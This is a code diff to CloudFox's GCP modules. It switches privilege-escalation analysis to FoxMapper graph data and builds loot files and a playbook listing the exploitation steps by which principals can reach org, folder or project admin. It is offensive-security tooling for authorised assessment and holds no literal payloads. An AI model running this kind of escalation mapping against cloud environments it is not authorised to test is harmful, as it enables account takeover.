@@ func runGCPPrivescCommand(cmd *cobra.Command, args []string) { module := &PrivescModule{ BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - AllPaths: []attackpathservice.AttackPath{}, - OrgPaths: []attackpathservice.AttackPath{}, - FolderPaths: []attackpathservice.AttackPath{}, - ProjectPaths: make(map[string][]attackpathservice.AttackPath), - ResourcePaths: []attackpathservice.AttackPath{}, - OrgIDs: []string{}, - OrgNames: make(map[string]string), - FolderNames: make(map[string]string), + Findings: []foxmapperservice.PrivescFinding{}, LootMap: make(map[string]*internal.LootFile), } module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } func (m *PrivescModule) Execute(ctx context.Context, logger internal.Logger) { - logger.InfoM("Analyzing privilege escalation paths across organizations, folders, projects, and resources...", globals.GCP_PRIVESC_MODULE_NAME) - - var result *attackpathservice.CombinedAttackPathData - - // Check if attack path analysis was already run (via --attack-paths flag) - // to avoid duplicate enumeration - if cache := gcpinternal.GetAttackPathCacheFromContext(ctx); cache != nil && cache.HasRawData() { - if cachedResult, ok := cache.GetRawData().(*attackpathservice.CombinedAttackPathData); ok { - logger.InfoM("Using cached attack path analysis results", globals.GCP_PRIVESC_MODULE_NAME) - // Filter to only include privesc paths (cache has all types) - result = filterPrivescPaths(cachedResult) + logger.InfoM("Analyzing privilege escalation paths using FoxMapper...", globals.GCP_PRIVESC_MODULE_NAME) + + // Get FoxMapper cache from context or try to load it + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache == nil || !m.FoxMapperCache.IsPopulated() { + // Try to load FoxMapper data (org from hierarchy if available) + orgID := "" + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID } + m.FoxMapperCache = gcpinternal.TryLoadFoxMapper(orgID, m.ProjectIDs) } - // If no context cache, try loading from disk cache - if result == nil { - diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) - if err == nil && diskCache != nil && diskCache.HasRawData() { - if cachedResult, ok := diskCache.GetRawData().(*attackpathservice.CombinedAttackPathData); ok { - logger.InfoM(fmt.Sprintf("Using disk cache (created: %s, projects: %v)", - metadata.CreatedAt.Format("2006-01-02 15:04:05"), metadata.ProjectsIn), globals.GCP_PRIVESC_MODULE_NAME) - // Filter to only include privesc paths - result = filterPrivescPaths(cachedResult) - } - } - } - - // If no cached data, run the analysis and save to disk - if result == nil { - logger.InfoM("Running privilege escalation analysis...", globals.GCP_PRIVESC_MODULE_NAME) - svc := attackpathservice.New() - var err error - // Run full analysis (all types) so we can cache for other modules - fullResult, err := svc.CombinedAttackPathAnalysis(ctx, m.ProjectIDs, m.ProjectNames, "all") - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_PRIVESC_MODULE_NAME, "Failed to analyze privilege escalation") - return - } - - // Save to disk cache for future use (skip if running under all-checks) - m.saveToAttackPathCache(ctx, fullResult, logger) - - // Filter to only include privesc paths for this module - result = filterPrivescPaths(fullResult) + if m.FoxMapperCache == nil || !m.FoxMapperCache.IsPopulated() { + logger.ErrorM("No FoxMapper data found. Run 'foxmapper gcp graph create' first.", globals.GCP_PRIVESC_MODULE_NAME) + logger.InfoM("FoxMapper creates a graph of IAM relationships for accurate privesc analysis.", globals.GCP_PRIVESC_MODULE_NAME) + return } - // Store results - m.AllPaths = result.AllPaths - m.OrgPaths = result.OrgPaths - m.FolderPaths = result.FolderPaths - m.ResourcePaths = result.ResourcePaths - m.OrgIDs = result.OrgIDs - m.OrgNames = result.OrgNames - m.FolderNames = result.FolderNames - - // Organize project paths by project ID - for _, path := range result.ProjectPaths { - if path.ScopeType == "project" && path.ScopeID != "" { - m.ProjectPaths[path.ScopeID] = append(m.ProjectPaths[path.ScopeID], path) - } - } + // Get the FoxMapper service and analyze privesc + svc := m.FoxMapperCache.GetService() + m.Findings = svc.AnalyzePrivesc() // Generate loot m.generateLoot() - if len(m.AllPaths) == 0 { + if len(m.Findings) == 0 { logger.InfoM("No privilege escalation paths found", globals.GCP_PRIVESC_MODULE_NAME) return } - // Count by scope type - orgCount := len(m.OrgPaths) - folderCount := len(m.FolderPaths) - projectCount := len(result.ProjectPaths) - resourceCount := len(m.ResourcePaths) + // Count statistics + adminCount := 0 + privescCount := 0 + orgReachable := 0 + folderReachable := 0 + projectReachable := 0 + + for _, f := range m.Findings { + if f.IsAdmin { + adminCount++ + } else if f.CanEscalate { + privescCount++ + if f.PathsToOrgAdmin > 0 { + orgReachable++ + } + if f.PathsToFolderAdmin > 0 { + folderReachable++ + } + if f.PathsToProjectAdmin > 0 { + projectReachable++ + } + } + } + + logger.SuccessM(fmt.Sprintf("Found %d admin(s) and %d principal(s) with privilege escalation paths", + adminCount, privescCount), globals.GCP_PRIVESC_MODULE_NAME) - logger.SuccessM(fmt.Sprintf("Found %d privilege escalation path(s): %d org-level, %d folder-level, %d project-level, %d resource-level", - len(m.AllPaths), orgCount, folderCount, projectCount, resourceCount), globals.GCP_PRIVESC_MODULE_NAME) + if privescCount > 0 { + logger.InfoM(fmt.Sprintf(" → %d can reach org admin, %d folder admin, %d project admin", + orgReachable, folderReachable, projectReachable), globals.GCP_PRIVESC_MODULE_NAME) + } m.writeOutput(ctx, logger) } @@ -207,11 +147,7 @@ func (m *PrivescModule) Execute(ctx context.Context, logger internal.Logger) { func (m *PrivescModule) generateLoot() { m.LootMap["privesc-exploit-commands"] = &internal.LootFile{ Name: "privesc-exploit-commands", - Contents: "# GCP Privilege Escalation Exploit Commands\n# Generated by CloudFox\n\n", - } - - for _, path := range m.AllPaths { - m.addPathToLoot(path) + Contents: "# GCP Privilege Escalation Exploit Commands\n# Generated by CloudFox using FoxMapper graph data\n\n", } // Generate playbook @@ -219,37 +155,139 @@ func (m *PrivescModule) generateLoot() { } func (m *PrivescModule) generatePlaybook() { + var sb strings.Builder + sb.WriteString("# GCP Privilege Escalation Playbook\n") + sb.WriteString("# Generated by CloudFox using FoxMapper graph data\n\n") + + // Group findings by admin level reachable + orgPaths := []foxmapperservice.PrivescFinding{} + folderPaths := []foxmapperservice.PrivescFinding{} + projectPaths := []foxmapperservice.PrivescFinding{} + + for _, f := range m.Findings { + if f.IsAdmin { + continue // Skip admins in playbook + } + if !f.CanEscalate { + continue + } + + switch f.HighestAdminLevel { + case "org": + orgPaths = append(orgPaths, f) + case "folder": + folderPaths = append(folderPaths, f) + case "project": + projectPaths = append(projectPaths, f) + } + } + + // Organization-level privesc (highest priority) + if len(orgPaths) > 0 { + sb.WriteString("## CRITICAL: Organization Admin Reachable\n\n") + for _, f := range orgPaths { + m.writePrivescFindingToPlaybook(&sb, f) + } + } + + // Folder-level privesc + if len(folderPaths) > 0 { + sb.WriteString("## HIGH: Folder Admin Reachable\n\n") + for _, f := range folderPaths { + m.writePrivescFindingToPlaybook(&sb, f) + } + } + + // Project-level privesc + if len(projectPaths) > 0 { + sb.WriteString("## MEDIUM: Project Admin Reachable\n\n") + for _, f := range projectPaths { + m.writePrivescFindingToPlaybook(&sb, f) + } + } + m.LootMap["privesc-playbook"] = &internal.LootFile{ Name: "privesc-playbook", - Contents: attackpathservice.GeneratePrivescPlaybook(m.AllPaths, ""), + Contents: sb.String(), } } -func (m *PrivescModule) addPathToLoot(path attackpathservice.AttackPath) { - lootFile := m.LootMap["privesc-exploit-commands"] - if lootFile == nil { - return - } +// writePrivescFindingToPlaybook writes a detailed privesc finding to the playbook +func (m *PrivescModule) writePrivescFindingToPlaybook(sb *strings.Builder, f foxmapperservice.PrivescFinding) { + sb.WriteString(fmt.Sprintf("### %s\n", f.Principal)) + sb.WriteString(fmt.Sprintf("- **Type**: %s\n", f.MemberType)) + sb.WriteString(fmt.Sprintf("- **Shortest path**: %d hops\n", f.ShortestPathHops)) + sb.WriteString(fmt.Sprintf("- **Viable paths**: %d\n", f.ViablePathCount)) + if f.ScopeBlockedCount > 0 { + sb.WriteString(fmt.Sprintf("- **Scope-blocked paths**: %d (OAuth scope restrictions)\n", f.ScopeBlockedCount)) + } + sb.WriteString("\n") + + // Show all paths with detailed steps + if len(f.Paths) > 0 { + sb.WriteString("#### Attack Paths\n\n") + for pathIdx, path := range f.Paths { + // Limit to top 5 paths per principal to avoid excessive output + if pathIdx >= 5 { + sb.WriteString(fmt.Sprintf("*... and %d more paths*\n\n", len(f.Paths)-5)) + break + } - scopeInfo := fmt.Sprintf("%s: %s", path.ScopeType, path.ScopeName) - if path.ScopeName == "" { - scopeInfo = fmt.Sprintf("%s: %s", path.ScopeType, path.ScopeID) - } - - lootFile.Contents += fmt.Sprintf( - "# Method: %s\n"+ - "# Principal: %s (%s)\n"+ - "# Scope: %s\n"+ - "# Target: %s\n"+ - "# Permissions: %s\n"+ - "%s\n\n", - path.Method, - path.Principal, path.PrincipalType, - scopeInfo, - path.TargetResource, - strings.Join(path.Permissions, ", "), - path.ExploitCommand, - ) + scopeStatus := "" + if path.ScopeBlocked { + scopeStatus = " ⚠️ SCOPE-BLOCKED" + } + + sb.WriteString(fmt.Sprintf("**Path %d** → %s (%s admin, %d hops)%s\n", + pathIdx+1, path.Destination, path.AdminLevel, path.HopCount, scopeStatus)) + sb.WriteString("```\n") + sb.WriteString(fmt.Sprintf("%s\n", f.Principal)) + + for i, edge := range path.Edges { + // Show the hop number and technique + prefix := " │" + if i == len(path.Edges)-1 { + prefix = " └" + } + + scopeWarning := "" + if edge.ScopeBlocksEscalation { + scopeWarning = " [BLOCKED BY SCOPE]" + } else if edge.ScopeLimited { + scopeWarning = " [scope-limited]" + } + + sb.WriteString(fmt.Sprintf("%s── (%d) %s%s\n", prefix, i+1, edge.ShortReason, scopeWarning)) + + // Show destination after each hop + if edge.Destination != "" { + destDisplay := edge.Destination + // Clean up member ID format for display + if strings.HasPrefix(destDisplay, "serviceAccount:") { + destDisplay = strings.TrimPrefix(destDisplay, "serviceAccount:") + } else if strings.HasPrefix(destDisplay, "user:") { + destDisplay = strings.TrimPrefix(destDisplay, "user:") + } + if i == len(path.Edges)-1 { + sb.WriteString(fmt.Sprintf(" → %s (ADMIN)\n", destDisplay)) + } else { + sb.WriteString(fmt.Sprintf(" │ → %s\n", destDisplay)) + } + } + } + sb.WriteString("```\n\n") + + // Show detailed exploitation steps + if !path.ScopeBlocked && len(path.Edges) > 0 { + sb.WriteString("**Exploitation steps:**\n") + for i, edge := range path.Edges { + sb.WriteString(fmt.Sprintf("%d. %s\n", i+1, edge.Reason)) + } + sb.WriteString("\n") + } + } + } + sb.WriteString("---\n\n") } func (m *PrivescModule) writeOutput(ctx context.Context, logger internal.Logger) { @@ -262,84 +300,162 @@ func (m *PrivescModule) writeOutput(ctx context.Context, logger internal.Logger) func (m *PrivescModule) getHeader() []string { return []string{ - "Project", - "Source", - "Principal Type", "Principal", - "Method", - "Target Resource", - "Category", - "Binding Scope", - "Permissions", + "Type", + "Is Admin", + "Admin Level", + "Can Escalate", + "Highest Reachable", + "Path Summary", + "Hops", + "Viable Paths", + "Scope Blocked", } } -func (m *PrivescModule) pathsToTableBody(paths []attackpathservice.AttackPath) [][]string { +func (m *PrivescModule) findingsToTableBody() [][]string { var body [][]string - for _, path := range paths { - scopeName := path.ScopeName - if scopeName == "" { - scopeName = path.ScopeID + for _, f := range m.Findings { + isAdmin := "No" + if f.IsAdmin { + isAdmin = "Yes" + } + + adminLevel := f.HighestAdminLevel + if adminLevel == "" { + adminLevel = "-" + } + + canEscalate := "No" + if f.CanEscalate { + canEscalate = "Yes" + } + + highestReachable := "-" + if f.CanEscalate || f.IsAdmin { + highestReachable = f.HighestAdminLevel + } + + // Build path summary showing cross-project or internal escalation + pathSummary := "-" + if f.CanEscalate && len(f.Paths) > 0 { + pathSummary = m.buildPathSummary(f) } - // Format binding scope (where the IAM binding is defined) - bindingScope := "Project" - if path.ScopeType == "organization" { - bindingScope = "Organization" - } else if path.ScopeType == "folder" { - bindingScope = "Folder" - } else if path.ScopeType == "resource" { - bindingScope = "Resource" + hops := "-" + if f.ShortestPathHops > 0 { + hops = fmt.Sprintf("%d", f.ShortestPathHops) } - // Format target resource - targetResource := path.TargetResource - if targetResource == "" || targetResource == "*" { - targetResource = "*" + viablePaths := "-" + if f.ViablePathCount > 0 { + viablePaths = fmt.Sprintf("%d", f.ViablePathCount) } - // Format permissions - permissions := strings.Join(path.Permissions, ", ") - if permissions == "" { - permissions = "-" + scopeBlocked := "-" + if f.ScopeBlockedCount > 0 { + scopeBlocked = fmt.Sprintf("%d", f.ScopeBlockedCount) } body = append(body, []string{ - scopeName, - path.ScopeType, - path.PrincipalType, - path.Principal, - path.Method, - targetResource, - path.Category, - bindingScope, - permissions, + f.Principal, + f.MemberType, + isAdmin, + adminLevel, + canEscalate, + highestReachable, + pathSummary, + hops, + viablePaths, + scopeBlocked, }) } return body } -func (m *PrivescModule) buildTablesForProject(projectID string) []internal.TableFile { - var tableFiles []internal.TableFile - if paths, ok := m.ProjectPaths[projectID]; ok && len(paths) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "privesc", - Header: m.getHeader(), - Body: m.pathsToTableBody(paths), - }) +// buildPathSummary creates a summary showing the escalation path type +// e.g., "proj-a → proj-b (cross-project)" or "proj-a (internal)" +func (m *PrivescModule) buildPathSummary(f foxmapperservice.PrivescFinding) string { + // Extract source project from principal email + sourceProject := extractProjectFromPrincipal(f.Principal) + + // Get destination project from the best path + destProject := f.HighestReachableProject + + // If we couldn't determine projects, show a simple summary + if sourceProject == "" && destProject == "" { + return fmt.Sprintf("→ %s admin", f.HighestAdminLevel) + } + + // Handle org/folder level escalation + if f.HighestAdminLevel == "org" { + if sourceProject != "" { + return fmt.Sprintf("%s → org", sourceProject) + } + return "→ org" + } + + if f.HighestAdminLevel == "folder" { + if sourceProject != "" { + return fmt.Sprintf("%s → folder", sourceProject) + } + return "→ folder" + } + + // Project-level escalation + if sourceProject == "" { + sourceProject = "?" + } + if destProject == "" { + destProject = "?" } - return tableFiles + + if sourceProject == destProject { + return fmt.Sprintf("%s (internal)", sourceProject) + } + + return fmt.Sprintf("%s → %s", sourceProject, destProject) +} + +// extractProjectFromPrincipal extracts project ID from a service account email +// e.g., "sa@my-project.iam.gserviceaccount.com" -> "my-project" +func extractProjectFromPrincipal(principal string) string { + // Handle service account format: name@project.iam.gserviceaccount.com + if strings.Contains(principal, ".iam.gserviceaccount.com") { + parts := strings.Split(principal, "@") + if len(parts) == 2 { + domain := parts[1] + projectPart := strings.TrimSuffix(domain, ".iam.gserviceaccount.com") + return projectPart + } + } + + // Handle compute default SA: project-number-compute@developer.gserviceaccount.com + if strings.Contains(principal, "-compute@developer.gserviceaccount.com") { + // Can't easily get project name from number, return empty + return "" + } + + // Handle App Engine default SA: project@appspot.gserviceaccount.com + if strings.Contains(principal, "@appspot.gserviceaccount.com") { + parts := strings.Split(principal, "@") + if len(parts) == 2 { + return strings.TrimSuffix(parts[0], "") + } + } + + return "" } func (m *PrivescModule) buildAllTables() []internal.TableFile { - if len(m.AllPaths) == 0 { + if len(m.Findings) == 0 { return nil } return []internal.TableFile{ { Name: "privesc", Header: m.getHeader(), - Body: m.pathsToTableBody(m.AllPaths), + Body: m.findingsToTableBody(), }, } } @@ -347,7 +463,7 @@ func (m *PrivescModule) buildAllTables() []internal.TableFile { func (m *PrivescModule) collectLootFiles() []internal.LootFile { var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox using FoxMapper graph data\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -360,33 +476,24 @@ func (m *PrivescModule) writeHierarchicalOutput(ctx context.Context, logger inte ProjectLevelData: make(map[string]internal.CloudfoxOutput), } - // Determine org ID - prefer hierarchy (for consistent output paths across modules), - // fall back to discovered orgs if hierarchy doesn't have org info - orgID := "" + // Determine scope - use org if available, otherwise first project + scopeID := "" if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { - orgID = m.Hierarchy.Organizations[0].ID - } else if len(m.OrgIDs) > 0 { - orgID = m.OrgIDs[0] + scopeID = m.Hierarchy.Organizations[0].ID + } else if len(m.ProjectIDs) > 0 { + scopeID = m.ProjectIDs[0] } - if orgID != "" { - // DUAL OUTPUT: Complete aggregated output at org level + if scopeID != "" { tables := m.buildAllTables() lootFiles := m.collectLootFiles() - outputData.OrgLevelData[orgID] = PrivescOutput{Table: tables, Loot: lootFiles} - // DUAL OUTPUT: Filtered per-project output - for _, projectID := range m.ProjectIDs { - projectTables := m.buildTablesForProject(projectID) - if len(projectTables) > 0 && len(projectTables[0].Body) > 0 { - outputData.ProjectLevelData[projectID] = PrivescOutput{Table: projectTables, Loot: nil} - } + // Use org level data if we have org scope + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + outputData.OrgLevelData[scopeID] = PrivescOutput{Table: tables, Loot: lootFiles} + } else { + outputData.ProjectLevelData[scopeID] = PrivescOutput{Table: tables, Loot: lootFiles} } - } else if len(m.ProjectIDs) > 0 { - // FALLBACK: No org discovered, output complete data to first project - tables := m.buildAllTables() - lootFiles := m.collectLootFiles() - outputData.ProjectLevelData[m.ProjectIDs[0]] = PrivescOutput{Table: tables, Loot: lootFiles} } pathBuilder := m.BuildPathBuilder() @@ -403,24 +510,16 @@ func (m *PrivescModule) writeFlatOutput(ctx context.Context, logger internal.Log output := PrivescOutput{Table: tables, Loot: lootFiles} - // Determine output scope - use org if available, otherwise fall back to project + // Determine output scope var scopeType string var scopeIdentifiers []string var scopeNames []string - if len(m.OrgIDs) > 0 { - // Use organization scope with [O] prefix format + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { scopeType = "organization" - for _, orgID := range m.OrgIDs { - scopeIdentifiers = append(scopeIdentifiers, orgID) - if name, ok := m.OrgNames[orgID]; ok && name != "" { - scopeNames = append(scopeNames, name) - } else { - scopeNames = append(scopeNames, orgID) - } - } + scopeIdentifiers = []string{m.Hierarchy.Organizations[0].ID} + scopeNames = []string{m.Hierarchy.Organizations[0].DisplayName} } else { - // Fall back to project scope scopeType = "project" scopeIdentifiers = m.ProjectIDs for _, id := range m.ProjectIDs { @@ -444,87 +543,3 @@ func (m *PrivescModule) writeFlatOutput(ctx context.Context, logger internal.Log logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PRIVESC_MODULE_NAME) } } - -// saveToAttackPathCache saves attack path data to disk cache -func (m *PrivescModule) saveToAttackPathCache(ctx context.Context, data *attackpathservice.CombinedAttackPathData, logger internal.Logger) { - // Skip saving if running under all-checks (consolidated save happens at the end) - if gcpinternal.IsAllChecksMode(ctx) { - logger.InfoM("Skipping individual cache save (all-checks mode)", globals.GCP_PRIVESC_MODULE_NAME) - return - } - - cache := gcpinternal.NewAttackPathCache() - - // Populate cache with paths from all scopes - var pathInfos []gcpinternal.AttackPathInfo - for _, path := range data.AllPaths { - pathInfos = append(pathInfos, gcpinternal.AttackPathInfo{ - Principal: path.Principal, - PrincipalType: path.PrincipalType, - Method: path.Method, - PathType: gcpinternal.AttackPathType(path.PathType), - Category: path.Category, - RiskLevel: path.RiskLevel, - Target: path.TargetResource, - Permissions: path.Permissions, - ScopeType: path.ScopeType, - ScopeID: path.ScopeID, - }) - } - cache.PopulateFromPaths(pathInfos) - cache.SetRawData(data) - - // Save to disk - err := gcpinternal.SaveAttackPathCacheToFile(cache, m.ProjectIDs, m.OutputDirectory, m.Account, "1.0") - if err != nil { - logger.InfoM(fmt.Sprintf("Could not save attack path cache: %v", err), globals.GCP_PRIVESC_MODULE_NAME) - } else { - privesc, exfil, lateral := cache.GetStats() - logger.InfoM(fmt.Sprintf("Saved attack path cache to disk (%d privesc, %d exfil, %d lateral)", - privesc, exfil, lateral), globals.GCP_PRIVESC_MODULE_NAME) - } -} - -// filterPrivescPaths filters a CombinedAttackPathData to only include privesc paths -// This is used when the cache contains all attack path types but privesc only needs privesc -func filterPrivescPaths(data *attackpathservice.CombinedAttackPathData) *attackpathservice.CombinedAttackPathData { - result := &attackpathservice.CombinedAttackPathData{ - OrgPaths: []attackpathservice.AttackPath{}, - FolderPaths: []attackpathservice.AttackPath{}, - ProjectPaths: []attackpathservice.AttackPath{}, - ResourcePaths: []attackpathservice.AttackPath{}, - AllPaths: []attackpathservice.AttackPath{}, - OrgNames: data.OrgNames, - FolderNames: data.FolderNames, - OrgIDs: data.OrgIDs, - } - - // Filter each path slice to only include privesc paths - for _, path := range data.OrgPaths { - if path.PathType == "privesc" { - result.OrgPaths = append(result.OrgPaths, path) - } - } - for _, path := range data.FolderPaths { - if path.PathType == "privesc" { - result.FolderPaths = append(result.FolderPaths, path) - } - } - for _, path := range data.ProjectPaths { - if path.PathType == "privesc" { - result.ProjectPaths = append(result.ProjectPaths, path) - } - } - for _, path := range data.ResourcePaths { - if path.PathType == "privesc" { - result.ResourcePaths = append(result.ResourcePaths, path) - } - } - for _, path := range data.AllPaths { - if path.PathType == "privesc" { - result.AllPaths = append(result.AllPaths, path) - } - } - - return result -} diff --git a/gcp/commands/scheduler.go b/gcp/commands/scheduler.go index c557accd..919b679f 100644 --- a/gcp/commands/scheduler.go +++ b/gcp/commands/scheduler.go @@ -49,7 +49,7 @@ type SchedulerModule struct { ProjectJobs map[string][]SchedulerService.JobInfo // projectID -> jobs LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results + FoxMapperCache *gcpinternal.FoxMapperCache // Cached FoxMapper analysis results mu sync.Mutex } @@ -86,8 +86,8 @@ func runGCPSchedulerCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *SchedulerModule) Execute(ctx context.Context, logger internal.Logger) { - // Get attack path cache from context (populated by all-checks or attack path analysis) - m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SCHEDULER_MODULE_NAME, m.processProject) @@ -266,9 +266,9 @@ func (m *SchedulerModule) jobsToTableBody(jobs []SchedulerService.JobInfo) [][]s // Check attack paths (privesc/exfil/lateral) for the service account attackPaths := "run --attack-paths" - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { if sa != "-" { - attackPaths = m.AttackPathCache.GetAttackSummary(sa) + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) } else { attackPaths = "No" } diff --git a/gcp/commands/secrets.go b/gcp/commands/secrets.go index 5f261712..fa62de42 100644 --- a/gcp/commands/secrets.go +++ b/gcp/commands/secrets.go @@ -50,11 +50,11 @@ type SecretsModule struct { gcpinternal.BaseGCPModule // Module-specific fields - per-project for hierarchical output - ProjectSecrets map[string][]SecretsService.SecretInfo // projectID -> secrets - LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results - client *secretmanager.Client - mu sync.Mutex + ProjectSecrets map[string][]SecretsService.SecretInfo // projectID -> secrets + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // Cached FoxMapper analysis results + client *secretmanager.Client + mu sync.Mutex } // ------------------------------ @@ -102,17 +102,10 @@ func runGCPSecretsCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *SecretsModule) Execute(ctx context.Context, logger internal.Logger) { - // Get attack path cache from context (populated by all-checks or attack path analysis) - m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) - - // If no context cache, try loading from disk cache - if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { - diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) - if err == nil && diskCache != nil && diskCache.IsPopulated() { - logger.InfoM(fmt.Sprintf("Using attack path cache from disk (created: %s)", - metadata.CreatedAt.Format("2006-01-02 15:04:05")), globals.GCP_SECRETS_MODULE_NAME) - m.AttackPathCache = diskCache - } + // Get FoxMapper cache for graph-based analysis + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_SECRETS_MODULE_NAME) } // Run enumeration with concurrency @@ -457,13 +450,9 @@ func (m *SecretsModule) secretsToTableBody(secrets []SecretsService.SecretInfo) // Check attack paths for service account principals attackPaths := "-" if memberType == "ServiceAccount" { - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { - // Extract email from member string (serviceAccount:email@...) - email := strings.TrimPrefix(member, "serviceAccount:") - attackPaths = m.AttackPathCache.GetAttackSummary(email) - } else { - attackPaths = "run --attack-paths" - } + // Extract email from member string (serviceAccount:email@...) + email := strings.TrimPrefix(member, "serviceAccount:") + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, email) } body = append(body, []string{ diff --git a/gcp/commands/serviceaccounts.go b/gcp/commands/serviceaccounts.go index c62205bc..5d3ffae5 100644 --- a/gcp/commands/serviceaccounts.go +++ b/gcp/commands/serviceaccounts.go @@ -57,7 +57,8 @@ type ServiceAccountsModule struct { // Module-specific fields - per-project for hierarchical output ProjectServiceAccounts map[string][]ServiceAccountAnalysis // projectID -> service accounts LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper graph data (preferred) + SARolesCache map[string]map[string][]string // projectID -> saEmail -> roles mu sync.Mutex } @@ -87,6 +88,7 @@ func runGCPServiceAccountsCommand(cmd *cobra.Command, args []string) { BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), ProjectServiceAccounts: make(map[string][]ServiceAccountAnalysis), LootMap: make(map[string]map[string]*internal.LootFile), + SARolesCache: make(map[string]map[string][]string), } // Execute enumeration @@ -97,17 +99,10 @@ func runGCPServiceAccountsCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *ServiceAccountsModule) Execute(ctx context.Context, logger internal.Logger) { - // Get attack path cache from context (populated by all-checks or attack path analysis) - m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) - - // If no context cache, try loading from disk cache - if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { - diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) - if err == nil && diskCache != nil && diskCache.IsPopulated() { - logger.InfoM(fmt.Sprintf("Using attack path cache from disk (created: %s)", - metadata.CreatedAt.Format("2006-01-02 15:04:05")), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) - m.AttackPathCache = diskCache - } + // Try to get FoxMapper cache (preferred - graph-based analysis) + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_SERVICEACCOUNTS_MODULE_NAME) } // Run enumeration with concurrency @@ -185,6 +180,16 @@ func (m *ServiceAccountsModule) processProject(ctx context.Context, projectID st } } + // Get roles for each service account (best effort) + saRoles := make(map[string][]string) + for _, sa := range serviceAccounts { + roles, err := iamService.GetRolesForServiceAccount(projectID, sa.Email) + if err == nil { + saRoles[sa.Email] = roles + } + // Silently skip if we can't get roles - user may not have IAM permissions + } + // Analyze each service account var analyzedSAs []ServiceAccountAnalysis for _, sa := range serviceAccounts { @@ -193,12 +198,17 @@ func (m *ServiceAccountsModule) processProject(ctx context.Context, projectID st if info, ok := impersonationMap[sa.Email]; ok { analyzed.ImpersonationInfo = info } + // Attach roles if available + if roles, ok := saRoles[sa.Email]; ok { + analyzed.Roles = roles + } analyzedSAs = append(analyzedSAs, analyzed) } // Thread-safe store per-project m.mu.Lock() m.ProjectServiceAccounts[projectID] = analyzedSAs + m.SARolesCache[projectID] = saRoles // Initialize loot for this project if m.LootMap[projectID] == nil { @@ -482,18 +492,28 @@ func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal } // getTableHeader returns the header for service accounts table +// Columns are grouped logically: +// - Identity: Project, Email, Display Name, Disabled, Default SA +// - Keys: User Managed Keys, Google Managed Keys, Oldest Key Age +// - Permissions: DWD, Roles, SA Attack Paths +// - Impersonation: IAM Binding Role, IAM Binding Principal func (m *ServiceAccountsModule) getTableHeader() []string { return []string{ + // Identity "Project", "Email", - "SA Attack Paths", "Display Name", "Disabled", "Default SA", - "DWD", + // Keys "User Managed Keys", "Google Managed Keys", "Oldest Key Age", + // Permissions + "DWD", + "Roles", + "SA Attack Paths", + // Impersonation "IAM Binding Role", "IAM Binding Principal", } @@ -508,7 +528,7 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser disabled = "Yes" } - defaultSA := "-" + defaultSA := "No" if sa.IsDefaultSA { defaultSA = sa.DefaultSAType } @@ -520,10 +540,8 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser } // Check attack paths (privesc/exfil/lateral) for this service account - attackPaths := "run --attack-paths" - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { - attackPaths = m.AttackPathCache.GetAttackSummary(sa.Email) - } + // FoxMapper takes priority if available (graph-based analysis) + attackPaths := gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa.Email) // Count keys by type and find oldest key age userKeyCount := 